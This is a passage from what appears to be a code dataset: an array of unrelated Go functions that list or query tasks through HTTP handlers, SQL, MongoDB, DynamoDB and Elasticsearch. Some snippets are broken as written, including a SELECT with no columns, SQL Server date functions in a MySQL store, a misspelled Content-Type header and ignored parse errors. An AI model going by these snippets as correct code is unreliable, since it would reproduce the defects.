*http.Request) {\n\tdatabase, err := loadJsonFile()\n\tif err != nil {\n\t\tlog.Print(\"error:\", err)\n\t\thttp.Error(writer, err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\treturnJson(database, writer)\n}", "func ViewAllTasksCommand(db *sql.DB) *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: \"view\",\n\t\tShort: \"view all tasks\",\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tresults, err := db.Query(\"SELECT * from task\")\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tfor results.Next() {\n\t\t\t\tvar task Task\n\t\t\t\terr = results.Scan(&task.Id, &task.Content, &task.Marked)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tfmt.Printf(\"%d. %s (%v)\\n\", task.Id, task.Content, task.Marked)\n\t\t\t}\n\t\t\treturn nil\n\t\t},\n\t}\n}", "func tasklist(ctx context.Context, w http.ResponseWriter, req *http.Request) {\n\ttasks := ctx.Value(\"tasks\").(*list.List)\n\n\tresp := mkEmptylist()\n\tif resp == nil {\n\t\tpanic(\"can't generate base UBER document\")\n\t}\n\n\tfor t, i := tasks.Front(), 0; t != nil; t = t.Next() {\n\t\tresp.appendItem(fmt.Sprintf(\"task%d\", i+1), t.Value.(string))\n\t\ti++\n\t}\n\n\tbs, err := json.Marshal(resp)\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\tw.Write(mkError(\"ServerError\", \"reason\", \"Cannot read HTTP request body\"))\n\t\treturn\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/vnd.uber+json\")\n\tw.WriteHeader(http.StatusOK)\n\tw.Write(bs)\n}", "func getTenantTasks(c *cli.Context, w io.Writer) error {\n\terr := checkArgCount(c, 1)\n\tif err != nil {\n\t\treturn err\n\t}\n\tid := c.Args().First()\n\n\tstate := c.String(\"state\")\n\toptions := &photon.TaskGetOptions{\n\t\tState: state,\n\t}\n\n\tclient.Photonclient, err = client.GetClient(c)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\ttaskList, err := client.Photonclient.Tenants.GetTasks(id, options)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\terr = printTaskList(taskList.Items, c)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func Tasks(ctx context.Context, biz *rlib.Business) {\n\tvar tldef rlib.TaskListDefinition\n\t// First... define a task list that has a \"pre-due-date\" on the 20th\n\t// and a due date at 5pm on the last day of the month.\n\ttldef.BID = biz.BID\n\ttldef.Cycle = rlib.RECURMONTHLY\n\ttldef.Name = \"Monthly Close\"\n\ttldef.Epoch = time.Date(2018, time.January, 1, 0, 0, 0, 0, time.UTC)\n\ttldef.EpochDue = time.Date(2018, time.January, 31, 17, 0, 0, 0, time.UTC)\n\ttldef.EpochPreDue = time.Date(2018, time.January, 20, 17, 0, 0, 0, time.UTC)\n\n\terr := rlib.InsertTaskListDefinition(ctx, &tldef)\n\tif err != nil {\n\t\tfmt.Printf(\"rlib.InsertTaskListDefinition: error = %s\\n\", err.Error())\n\t\treturn\n\t}\n\n\tvar due = time.Date(2018, time.January, 31, 20, 0, 0, 0, time.UTC) //\n\tvar predue = time.Date(2018, time.January, 20, 20, 0, 0, 0, time.UTC)\n\tvar t = []rlib.TaskDescriptor{\n\t\t{Name: \"Delinquency Report\", Worker: \"Manual\", EpochDue: due, EpochPreDue: predue},\n\t\t{Name: \"Walk the Units\", Worker: \"Manual\", EpochDue: due, EpochPreDue: predue},\n\t\t{Name: \"Generate Offsets\", Worker: \"OffsetBot\", EpochDue: due, EpochPreDue: predue},\n\t}\n\n\tfor i := 0; i < len(t); i++ {\n\t\tt[i].TLDID = tldef.TLDID\n\t\terr := rlib.InsertTaskDescriptor(ctx, &t[i])\n\t\tif err != nil {\n\t\t\tfmt.Printf(\"rlib.InsertTaskDescriptor: error = %s\\n\", err.Error())\n\t\t\treturn\n\t\t}\n\t}\n\n\t//----------------------------------------------\n\t// Now, create an instance of this task list.\n\t//----------------------------------------------\n\tpivot := time.Date(2018, time.February, 3, 12, 32, 13, 0, time.UTC)\n\t_, err = rlib.CreateTaskListInstance(ctx, tldef.TLDID, 0, &pivot)\n\tif err != nil {\n\t\tfmt.Printf(\"CreateTaskListInstance: error = %s\\n\", err.Error())\n\t}\n}", "func (db DB) GetTasks(userID string) ([]types.Task, error) {\n\tvar tasks []types.Task\n\tclient, err := db.Connect()\n\tif err != nil {\n\t\treturn tasks, err\n\t}\n\tfilter := bson.M{\"user_id\": userID}\n\tctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)\n\tdefer cancel()\n\tcursor, err := client.Database(\"tasker\").Collection(\"tasks\").Find(ctx, filter)\n\tif err != nil {\n\t\treturn tasks, err\n\t}\n\tfor cursor.Next(ctx) {\n\t\tvar task types.Task\n\t\tif err := cursor.Decode(&task); err != nil {\n\t\t\treturn tasks, err\n\t\t}\n\t\tif task.Done && time.Now().Sub(task.Date) > 720*time.Hour {\n\t\t\tif _, err := client.Database(\"tasker\").Collection(\"tasks\").DeleteOne(ctx, bson.M{\"title\": task.Title}); err != nil {\n\t\t\t\treturn tasks, err\n\t\t\t}\n\t\t}\n\t\ttasks = append(tasks, task)\n\t}\n\treturn tasks, nil\n}", "func taskPubList(c *bm.Context) {\n\tmidI, ok := c.Get(\"mid\")\n\tif !ok {\n\t\tc.JSON(nil, ecode.CreativeNotLogin)\n\t\treturn\n\t}\n\tmid, _ := midI.(int64)\n\n\tdata, err := newcomerSvc.TaskPubList(c, mid)\n\tif err != nil {\n\t\tc.JSON(nil, err)\n\t\treturn\n\t}\n\tc.JSON(data, nil)\n}", "func (ms *MySQLStore) GetCompletedWithinMonth(userID int64) ([]*tasks.Task, error) {\n\tquery := \"SELECT ID, Name, Description, IsComplete, IsHidden, CreatedAt, EditedAt FROM TodoList WHERE UserID = ? AND CreatedAt > DATEADD(month,-1,GETDATE()) AND IsComplete\"\n\trows, err := ms.Client.Query(query, userID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer rows.Close()\n\n\t// Extract each task\n\ttodoList := []*tasks.Task{}\n\tfor rows.Next() {\n\t\tdescription := sql.NullString{}\n\t\ttask := &tasks.Task{}\n\t\tif err := rows.Scan(&task.ID, &task.Name, &description, &task.IsComplete,\n\t\t\t&task.IsHidden, &task.CreatedAt, &task.EditedAt); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\ttask.Description = description.String\n\t\ttodoList = append(todoList, task)\n\t}\n\n\t// Set all todoList to the same user\n\tuser, err := ms.UserStore.GetByID(userID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, task := range todoList {\n\t\ttask.User = user\n\t}\n\n\treturn todoList, nil\n}", "func visTasks(tasks []db.Task, full bool) {\n\tstasks := make([]string, len(tasks))\n\tfor i, val := range tasks {\n\t\tif full {\n\t\t\tstasks[i] = fmt.Sprintf(\"Task no. %d)\\n%v\", i+1, val)\n\t\t} else {\n\t\t\tstasks[i] = fmt.Sprintf(\"Task no. %d) %s\\n\", i+1, val.Body)\n\t\t}\n\t}\n\tif full {\n\t\tfmt.Println(strings.Join(stasks, \"\\n\\n\"))\n\t} else {\n\t\tfmt.Print(strings.Join(stasks, \"\"))\n\t}\n}", "func GetAllTask(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Content-type\", \"application/json\")\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\tpayload := getAllTask()\n\tjson.NewEncoder(w).Encode(payload)\n}", "func (r *TaskRepository) GetUserActiveTasks(db db.DB, userID int) (*[]entities.Task, error) {\n\tTasks := &[]entities.Task{}\n\terr := db.Select(Tasks,\n\t\t\"SELECT FROM tasks t WHERE t.id IN(select t.id FROM tasks tt INNER JOIN users u ON tt.user_id=u.id WHERE u.id=$1 AND tt.status=$2)\",\n\t\tuserID, constants.InProgress)\n\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"error selecting user's tasks from db: %w\", err)\n\t}\n\treturn Tasks, nil\n}", "func (db *DynamoDB) ListTasks(ctx context.Context, req *tes.ListTasksRequest) (*tes.ListTasksResponse, error) {\n\n\tvar tasks []*tes.Task\n\tvar query *dynamodb.QueryInput\n\tpageSize := int64(tes.GetPageSize(req.GetPageSize()))\n\n\tquery = &dynamodb.QueryInput{\n\t\tTableName: aws.String(db.taskTable),\n\t\tLimit: aws.Int64(pageSize),\n\t\tScanIndexForward: aws.Bool(false),\n\t\tConsistentRead: aws.Bool(true),\n\t\tKeyConditionExpression: aws.String(fmt.Sprintf(\"%s = :v1\", db.partitionKey)),\n\t\tExpressionAttributeValues: map[string]*dynamodb.AttributeValue{\n\t\t\t\":v1\": {\n\t\t\t\tS: aws.String(db.partitionValue),\n\t\t\t},\n\t\t},\n\t}\n\n\tfilterParts := []string{}\n\tif req.State != tes.Unknown {\n\t\tquery.ExpressionAttributeNames = map[string]*string{\n\t\t\t\"#state\": aws.String(\"state\"),\n\t\t}\n\t\tquery.ExpressionAttributeValues[\":stateFilter\"] = &dynamodb.AttributeValue{\n\t\t\tN: aws.String(strconv.Itoa(int(req.State))),\n\t\t}\n\t\tfilterParts = append(filterParts, \"#state = :stateFilter\")\n\t}\n\n\tfor k, v := range req.Tags {\n\t\ttmpl := \"tags.%s = :%sFilter\"\n\t\tfilterParts = append(filterParts, fmt.Sprintf(tmpl, k, k))\n\t\tif v == \"\" {\n\t\t\tquery.ExpressionAttributeValues[fmt.Sprintf(\":%sFilter\", k)] = &dynamodb.AttributeValue{\n\t\t\t\tNULL: aws.Bool(true),\n\t\t\t}\n\t\t} else {\n\t\t\tquery.ExpressionAttributeValues[fmt.Sprintf(\":%sFilter\", k)] = &dynamodb.AttributeValue{\n\t\t\t\tS: aws.String(v),\n\t\t\t}\n\t\t}\n\t}\n\n\tif len(filterParts) > 0 {\n\t\tquery.FilterExpression = aws.String(strings.Join(filterParts, \" AND \"))\n\t}\n\n\tif req.View == tes.TaskView_MINIMAL {\n\t\tquery.ExpressionAttributeNames = map[string]*string{\n\t\t\t\"#state\": aws.String(\"state\"),\n\t\t}\n\t\tquery.ProjectionExpression = aws.String(\"id, #state\")\n\t}\n\n\tif req.PageToken != \"\" {\n\t\tquery.ExclusiveStartKey = map[string]*dynamodb.AttributeValue{\n\t\t\tdb.partitionKey: {\n\t\t\t\tS: aws.String(db.partitionValue),\n\t\t\t},\n\t\t\t\"id\": {\n\t\t\t\tS: aws.String(req.PageToken),\n\t\t\t},\n\t\t}\n\t}\n\n\tresponse, err := db.client.QueryWithContext(ctx, query)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif req.View == tes.TaskView_FULL {\n\t\tfor _, item := range response.Items {\n\t\t\t// TODO handle errors\n\t\t\t_ = db.getContent(ctx, item)\n\t\t\t_ = db.getExecutorOutput(ctx, item, \"stdout\", db.stdoutTable)\n\t\t\t_ = db.getExecutorOutput(ctx, item, \"stderr\", db.stderrTable)\n\t\t\t_ = db.getSystemLogs(ctx, item)\n\t\t}\n\t}\n\n\terr = dynamodbattribute.UnmarshalListOfMaps(response.Items, &tasks)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to DynamoDB unmarshal Tasks, %v\", err)\n\t}\n\n\tout := tes.ListTasksResponse{\n\t\tTasks: tasks,\n\t}\n\n\tif response.LastEvaluatedKey != nil {\n\t\tout.NextPageToken = *response.LastEvaluatedKey[\"id\"].S\n\t}\n\n\treturn &out, nil\n}", "func GetAllTask(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Context-Type\", \"application/x-www-form-urlencoded\")\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\tpayload := getAllTask()\n\tjson.NewEncoder(w).Encode(payload)\n}", "func (d *InMemoryTaskDB) GetTasksFromDateRange(_ context.Context, start, end time.Time, repo string) ([]*types.Task, error) {\n\td.tasksMtx.RLock()\n\tdefer d.tasksMtx.RUnlock()\n\n\trv := []*types.Task{}\n\t// TODO(borenet): Binary search.\n\tfor _, b := range d.tasks {\n\t\tif (b.Created.Equal(start) || b.Created.After(start)) && b.Created.Before(end) {\n\t\t\tif repo == \"\" || b.Repo == repo {\n\t\t\t\trv = append(rv, b.Copy())\n\t\t\t}\n\t\t}\n\t}\n\tsort.Sort(types.TaskSlice(rv))\n\treturn rv, nil\n}", "func GetTasks(w http.ResponseWriter, r *http.Request) {\n\ttasks, err := repository.AllTasks()\n\n\tif err != nil {\n\t\thttp.Error(w, http.StatusText(500), http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(http.StatusOK)\n\n\tjson.NewEncoder(w).Encode(tasks)\n}", "func (ms *MySQLStore) GetCompletedWithinYear(userID int64) ([]*tasks.Task, error) {\n\tquery := \"SELECT ID, Name, Description, IsComplete, IsHidden, CreatedAt, EditedAt FROM TodoList WHERE UserID = ? AND CreatedAt > DATEADD(year,-1,GETDATE()) AND IsComplete\"\n\trows, err := ms.Client.Query(query, userID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer rows.Close()\n\n\t// Extract each task\n\ttodoList := []*tasks.Task{}\n\tfor rows.Next() {\n\t\tdescription := sql.NullString{}\n\t\ttask := &tasks.Task{}\n\t\tif err := rows.Scan(&task.ID, &task.Name, &description, &task.IsComplete,\n\t\t\t&task.IsHidden, &task.CreatedAt, &task.EditedAt); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\ttask.Description = description.String\n\t\ttodoList = append(todoList, task)\n\t}\n\n\t// Set all todoList to the same user\n\tuser, err := ms.UserStore.GetByID(userID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, task := range todoList {\n\t\ttask.User = user\n\t}\n\n\treturn todoList, nil\n}", "func TasksTask() {\n\tfmt.Println(\"Tasks:\")\n\tfmt.Print(\" \")\n\tfor key := range tasks {\n\t\tfmt.Print(\" \", key)\n\t}\n\tfmt.Println(\"\")\n\tfmt.Println(\"Switches:\")\n\tflag.PrintDefaults()\n}", "func (db *DynamoDB) ListTasks(ctx context.Context, req *tes.ListTasksRequest) (*tes.ListTasksResponse, error) {\n\n\tvar tasks []*tes.Task\n\tvar pageSize int64 = 256\n\tvar query *dynamodb.QueryInput\n\n\tif req.PageSize != 0 {\n\t\tpageSize = int64(req.GetPageSize())\n\t\tif pageSize > 2048 {\n\t\t\tpageSize = 2048\n\t\t}\n\t\tif pageSize < 50 {\n\t\t\tpageSize = 50\n\t\t}\n\t}\n\n\tquery = &dynamodb.QueryInput{\n\t\tTableName: aws.String(db.taskTable),\n\t\tLimit: aws.Int64(pageSize),\n\t\tScanIndexForward: aws.Bool(false),\n\t\tConsistentRead: aws.Bool(true),\n\t\tKeyConditionExpression: aws.String(fmt.Sprintf(\"%s = :v1\", db.partitionKey)),\n\t\tExpressionAttributeValues: map[string]*dynamodb.AttributeValue{\n\t\t\t\":v1\": {\n\t\t\t\tS: aws.String(db.partitionValue),\n\t\t\t},\n\t\t},\n\t}\n\n\tif req.View == tes.TaskView_MINIMAL {\n\t\tquery.ExpressionAttributeNames = map[string]*string{\n\t\t\t\"#state\": aws.String(\"state\"),\n\t\t}\n\t\tquery.ProjectionExpression = aws.String(\"id, #state\")\n\t}\n\n\tif req.PageToken != \"\" {\n\t\tquery.ExclusiveStartKey = map[string]*dynamodb.AttributeValue{\n\t\t\tdb.partitionKey: {\n\t\t\t\tS: aws.String(db.partitionValue),\n\t\t\t},\n\t\t\t\"id\": {\n\t\t\t\tS: aws.String(req.PageToken),\n\t\t\t},\n\t\t}\n\t}\n\n\tresponse, err := db.client.QueryWithContext(ctx, query)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif req.View == tes.TaskView_FULL {\n\t\tfor _, item := range response.Items {\n\t\t\t// TODO handle errors\n\t\t\t_ = db.getContent(ctx, item)\n\t\t\t_ = db.getExecutorOutput(ctx, item, \"stdout\", db.stdoutTable)\n\t\t\t_ = db.getExecutorOutput(ctx, item, \"stderr\", db.stderrTable)\n\t\t}\n\t}\n\n\terr = dynamodbattribute.UnmarshalListOfMaps(response.Items, &tasks)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to DynamoDB unmarshal Tasks, %v\", err)\n\t}\n\n\tout := tes.ListTasksResponse{\n\t\tTasks: tasks,\n\t}\n\n\tif response.LastEvaluatedKey != nil {\n\t\tout.NextPageToken = *response.LastEvaluatedKey[\"id\"].S\n\t}\n\n\treturn &out, nil\n}", "func (tdc ToDoController) ListAllActiveTasks(w http.ResponseWriter, r *http.Request, params httprouter.Params) {\n\n\ttodoID, err := strconv.Atoi(params.ByName(\"id\"))\n\n\tvar activeTasks []model.Task\n\n\tactiveTasks, err = model.ListAllActiveTasks(todoID)\n\n\tif err != nil {\n\t\tutils.WriteJSON(w, err, 500)\n\t\treturn\n\t}\n\n\tutils.WriteJSON(w, activeTasks, 200)\n\n}", "func Index(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Content-Type\", \"application/json; charset=UTF-8\")\n\n\ttasks, err := model.Tasks()\n\tif err != nil {\n\t\tlog.Println(err)\n\t}\n\n\tw.WriteHeader(http.StatusOK)\n\tif err := json.NewEncoder(w).Encode(tasks); err != nil {\n\t\tpanic(err)\n\t}\n}", "func (tdc ToDoController) ListTasks(w http.ResponseWriter, r *http.Request, params httprouter.Params) {\n\n\ttodoID, err := strconv.Atoi(params.ByName(\"id\"))\n\n\tvar tasks []model.Task\n\n\ttasks, err = model.ListTasks(todoID)\n\n\tif err != nil {\n\t\tutils.WriteJSON(w, err, 500)\n\t\treturn\n\t}\n\n\tutils.WriteJSON(w, tasks, 200)\n}", "func runList(props ListCmdProps, output io.Writer, repo db.Repo) error {\n\tstart, err := parseDateOrDefault(props.startDate)\n\n\tif props.startDate == \"\" {\n\t\tdefaultStart := start.Add(-1 * time.Hour * 24 * 30)\n\t\tstart = &defaultStart\n\t}\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tend, err := parseDateOrDefault(props.endDate)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tworkingDays, err := repo.ListRange(start, end)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\trenderTable(workingDays, output)\n\n\treturn nil\n}", "func getEndPoint(fromDate, toDate string) string {\r\n\t// Setting the Base URL\r\n\tendpoint, _ := url.Parse(\"https://digitalcrew.teamwork.com/projects/api/v2/projects/263073/tasks.json\")\r\n\r\n\t// Setting the query params\r\n\tparams := url.Values{}\r\n\r\n\tparams.Add(\"includeBlockedTasks\", \"true\")\r\n\tparams.Add(\"include\", \"taskListNames\")\r\n\tparams.Add(\"includeCompletedTasks\", \"true\")\r\n\tparams.Add(\"tagIds\", \"3871\")\r\n\tparams.Add(\"matchAllTags\", \"true\")\r\n\tparams.Add(\"matchAllExcludedTags\", \"false\")\r\n\tparams.Add(\"createdAfterDate\", fromDate)\r\n\tparams.Add(\"createdBeforeDate\", toDate)\r\n\r\n\t//Adding the query params to the base url\r\n\tendpoint.RawQuery = params.Encode()\r\n\treturn endpoint.String()\r\n}", "func (s *SearchService) Tasks(opts map[string]interface{}, page models.Page) (map[string]int64, error) {\n\tvar err error\n\terr = s.resetESClient()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar querys []elastic.Query\n\tfor k, v := range opts {\n\t\tquerys = append(querys, elastic.NewTermQuery(k, v))\n\t}\n\tbquery := elastic.NewBoolQuery().\n\t\tFilter(elastic.NewRangeQuery(\"logtime.timestamp\").Gte(page.RangeFrom).Lte(page.RangeTo).Format(\"epoch_millis\")).\n\t\tMust(querys...)\n\n\t//Index(\"dataman-*\").\n\ttasks := make(map[string]int64)\n\ttaskLabel := config.LogTaskLabel()\n\tresult, err := s.ESClient.Search().\n\t\tIndex(\"dataman-*\").\n\t\tSearchType(\"count\").\n\t\tQuery(bquery).\n\t\tAggregation(\"tasks\", elastic.NewTermsAggregation().Field(taskLabel).Size(0).OrderByCountDesc()).\n\t\tPretty(true).\n\t\tDo()\n\n\tif err != nil && err.(*elastic.Error).Status == http.StatusNotFound {\n\t\treturn nil, nil\n\t}\n\n\tif err != nil {\n\t\treturn tasks, err\n\t}\n\n\tagg, found := result.Aggregations.Terms(\"tasks\")\n\tif !found {\n\t\treturn tasks, nil\n\t}\n\n\tfor _, bucket := range agg.Buckets {\n\t\ttasks[fmt.Sprint(bucket.Key)] = bucket.DocCount\n\t}\n\treturn tasks, nil\n}", "func (ts *TaskServiceImpl) QueryByUserId(user_id string, page int) ([]*Task, error) {\n\tvar (\n\t\tid uint32\n\t\tcontent string\n\t\tcomment string\n\t\tstarted time.Time\n\t\tended time.Time\n\t\tstoped time.Time\n\t\tstatus uint8\n\n\t\ttasks []*Task\n\t)\n\n\trows, err := ts.DB.Query(taskSqls[sqlQuerybyUserId], user_id, page)\n\tif err != nil {\n\n\t\treturn nil, err\n\t}\n\tdefer rows.Close()\n\n\tfor rows.Next() {\n\t\tif err := rows.Scan(&id, &content, &comment, &started, &ended, &stoped, &status); err != nil {\n\n\t\t\treturn nil, err\n\t\t}\n\n\t\ttask := &Task{\n\t\t\tID: id,\n\t\t\tUser_id: user_id,\n\t\t\tContent: content,\n\t\t\tComment: comment,\n\t\t\tStarted: started,\n\t\t\tEnded: ended,\n\t\t\tStoped: stoped,\n\t\t}\n\t\ttasks = append(tasks, task)\n\t}\n\n\treturn tasks, nil\n}", "func (ts *TaskSet) DisplayByNext() {\n\tif ts.numTasksLoaded == 0 {\n\t\tfmt.Println(\"\\033[31mNo tasks found. Showing help.\\033[0m\")\n\t\tHelp(\"\")\n\t} else if len(ts.tasks) == 0 {\n\t\tExitFail(\"No matching tasks in given context or filter.\")\n\t} else if len(ts.tasks) == 1 {\n\t\tts.tasks[0].Display()\n\t\treturn\n\t} else {\n\t\tvar tasks []*Task\n\t\tw, h := MustGetTermSize()\n\n\t\th -= 8 // leave room for context message, header and prompt\n\n\t\tif h > len(ts.tasks) || h < 0 {\n\t\t\ttasks = ts.tasks\n\t\t} else {\n\t\t\ttasks = ts.tasks[:h]\n\t\t}\n\n\t\ttable := NewTable(\n\t\t\tw,\n\t\t\t\"ID\",\n\t\t\t\"Priority\",\n\t\t\t\"Tags\",\n\t\t\t\"Project\",\n\t\t\t\"Summary\",\n\t\t)\n\n\t\tfor _, t := range tasks {\n\t\t\tstyle := t.Style()\n\t\t\ttable.AddRow(\n\t\t\t\t[]string{\n\t\t\t\t\t// id should be at least 2 chars wide to match column header\n\t\t\t\t\t// (headers can be truncated)\n\t\t\t\t\tfmt.Sprintf(\"%-2d\", t.ID),\n\t\t\t\t\tt.Priority,\n\t\t\t\t\tstrings.Join(t.Tags, \" \"),\n\t\t\t\t\tt.Project,\n\t\t\t\t\tt.Summary,\n\t\t\t\t},\n\t\t\t\tstyle,\n\t\t\t)\n\t\t}\n\n\t\ttable.Render()\n\n\t\tif h >= len(ts.tasks) {\n\t\t\tfmt.Printf(\"\\n%v tasks.\\n\", len(ts.tasks))\n\t\t} else {\n\t\t\tfmt.Printf(\"\\n%v tasks, truncated to %v lines.\\n\", len(ts.tasks), h)\n\t\t}\n\t}\n}", "func (context Context) GetTasks(\n\tfilters F,\n\tlimit int,\n\tcursor string,\n\tsortBy string,\n\torder string,\n) (result []Task, cm CollectionMetadata, err error) {\n\n\tc := context.Session.DB(context.DBName).C(\"tasks\")\n\n\t// Validate the parameters.\n\tif sortBy != \"\" &&\n\t\tsortBy != \"id\" &&\n\t\tsortBy != \"process\" &&\n\t\tsortBy != \"job\" &&\n\t\tsortBy != \"user\" &&\n\t\tsortBy != \"dataset\" &&\n\t\tsortBy != \"objective\" &&\n\t\tsortBy != \"model\" &&\n\t\tsortBy != \"quality\" &&\n\t\tsortBy != \"quality-train\" &&\n\t\tsortBy != \"quality-expected\" &&\n\t\tsortBy != \"creation-time\" &&\n\t\tsortBy != \"status\" &&\n\t\tsortBy != \"stage\" {\n\t\terr = errors.Wrapf(ErrBadInput, \"cannot sort by \\\"%s\\\"\", sortBy)\n\t\treturn\n\t}\n\tif order != \"\" && order != \"asc\" && order != \"desc\" {\n\t\terr = errors.Wrapf(ErrBadInput, \"order can be either \\\"asc\\\" or \\\"desc\\\", not \\\"%s\\\"\", order)\n\t\treturn\n\t}\n\tif order == \"\" {\n\t\torder = \"asc\"\n\t}\n\n\t// If the user is not root then we need to limit access.\n\tquery := bson.M{}\n\tif context.User.IsRoot() == false {\n\t\tquery = bson.M{\"user\": bson.M{\"$in\": []string{context.User.ID, UserRoot}}}\n\t}\n\n\t// Build a query given the parameters.\n\tfor k, v := range filters {\n\t\tswitch k {\n\t\tcase \"id\":\n\t\t\tsetDefault(&query, \"id\", bson.M{})\n\t\t\tquery[\"id\"].(bson.M)[\"$in\"] = v.([]string)\n\t\tcase \"user\", \"dataset\", \"model\", \"objective\", \"status\", \"stage\":\n\t\t\tsetDefault(&query, k, bson.M{})\n\t\t\tquery[k].(bson.M)[\"$eq\"] = v.(string)\n\t\tcase \"process\", \"job\":\n\t\t\tsetDefault(&query, k, bson.M{})\n\t\t\tquery[k].(bson.M)[\"$eq\"] = v.(bson.ObjectId)\n\t\tcase \"alt-objective\":\n\t\t\tsetDefault(&query, \"alt-objectives\", bson.M{})\n\t\t\tquery[\"alt-objectives\"].(bson.M)[\"$elemMatch\"] = bson.M{\"$eq\": v.(string)}\n\t\tdefault:\n\t\t\terr = errors.Wrap(ErrBadInput, \"invalid value of argument filters\")\n\t\t\treturn\n\t\t}\n\t}\n\n\t// We count the result size given the filters. This is before pagination.\n\tvar resultSize int\n\tresultSize, err = c.Find(query).Count()\n\tif err != nil {\n\t\terr = errors.Wrap(err, \"mongo find failed\")\n\t\treturn\n\t}\n\n\t// If a cursor was specified then we have to do a range query.\n\tif cursor != \"\" {\n\t\tcomparer := \"$gt\"\n\t\tif order == \"desc\" {\n\t\t\tcomparer = \"$lt\"\n\t\t}\n\n\t\t// If there is no sorting then the cursor only points to the _id field.\n\t\tif sortBy != \"\" {\n\t\t\tsplits := strings.Split(cursor, \"-\")\n\t\t\tcursor = splits[1]\n\t\t\tvar decoded []byte\n\t\t\tdecoded, err = hex.DecodeString(splits[0])\n\t\t\tif err != nil {\n\t\t\t\terr = errors.Wrap(err, \"hex decode string failed\")\n\t\t\t\treturn\n\t\t\t}\n\t\t\tvar otherCursor interface{}\n\t\t\tswitch sortBy {\n\t\t\tcase \"id\", \"user\", \"process\", \"job\", \"dataset\", \"model\", \"objective\", \"status\", \"stage\":\n\t\t\t\totherCursor = string(decoded)\n\t\t\tcase \"creation-time\":\n\t\t\t\tvar t time.Time\n\t\t\t\tt.GobDecode(decoded)\n\t\t\t\totherCursor = t\n\t\t\tcase \"quality\", \"quality-train\", \"quality-expected\":\n\t\t\t\totherCursor = math.Float64frombits(binary.BigEndian.Uint64(decoded))\n\t\t\t}\n\n\t\t\tsetDefault(&query, \"$or\", bson.M{})\n\t\t\tquery[\"$or\"] = []bson.M{\n\t\t\t\tbson.M{sortBy: bson.M{comparer: otherCursor}},\n\t\t\t\tbson.M{sortBy: bson.M{\"$eq\": otherCursor}, \"_id\": bson.M{comparer: bson.ObjectIdHex(cursor)}},\n\t\t\t}\n\t\t} else {\n\t\t\tif bson.IsObjectIdHex(cursor) == false {\n\t\t\t\terr = errors.Wrap(ErrBadInput, \"invalid cursor\")\n\t\t\t\treturn\n\t\t\t}\n\t\t\tsetDefault(&query, \"_id\", bson.M{})\n\t\t\tquery[\"_id\"].(bson.M)[comparer] = bson.ObjectIdHex(cursor)\n\t\t}\n\t}\n\n\t// Execute the query.\n\tq := c.Find(query)\n\n\t// We always sort by _id, but we may also sort by a specific field.\n\tif sortBy == \"\" {\n\t\tif order == \"asc\" {\n\t\t\tq = q.Sort(\"_id\")\n\t\t} else {\n\t\t\tq = q.Sort(\"-_id\")\n\t\t}\n\t} else {\n\t\tif order == \"asc\" {\n\t\t\tq = q.Sort(sortBy, \"_id\")\n\t\t} else {\n\t\t\tq = q.Sort(\"-\"+sortBy, \"-_id\")\n\t\t}\n\t}\n\n\tif limit > 0 {\n\t\tq = q.Limit(limit)\n\t}\n\n\t// Collect the results.\n\tvar allResults []Task\n\terr = q.All(&allResults)\n\tif err != nil {\n\t\terr = errors.Wrap(err, \"mongo find failed\")\n\t\treturn\n\t}\n\n\t// Update computed fields.\n\tfor i := range allResults {\n\t\tallResults[i].StageDurations = allResults[i].GetStageDurations()\n\t\tallResults[i].RunningDuration = allResults[i].GetRunningDuration()\n\t}\n\n\t// Compute the next cursor.\n\tnextCursor := \"\"\n\tif limit > 0 && len(allResults) == limit {\n\t\tlastResult := allResults[len(allResults)-1]\n\t\tnextCursor = lastResult.ObjectID.Hex()\n\n\t\tif sortBy != \"\" {\n\t\t\tvar encoded string\n\t\t\tvar b []byte\n\t\t\tswitch sortBy {\n\t\t\tcase \"id\":\n\t\t\t\tb = []byte(lastResult.ID)\n\t\t\tcase \"user\":\n\t\t\t\tb = []byte(lastResult.User)\n\t\t\tcase \"process\":\n\t\t\t\tb = []byte(lastResult.Process)\n\t\t\tcase \"job\":\n\t\t\t\tb = []byte(lastResult.Job)\n\t\t\tcase \"dataset\":\n\t\t\t\tb = []byte(lastResult.Dataset)\n\t\t\tcase \"model\":\n\t\t\t\tb = []byte(lastResult.Model)\n\t\t\tcase \"objective\":\n\t\t\t\tb = []byte(lastResult.Objective)\n\t\t\tcase \"creation-time\":\n\t\t\t\tb, err = lastResult.CreationTime.GobEncode()\n\t\t\tcase \"quality\":\n\t\t\t\tb = make([]byte, 8)\n\t\t\t\tbinary.BigEndian.PutUint64(b, 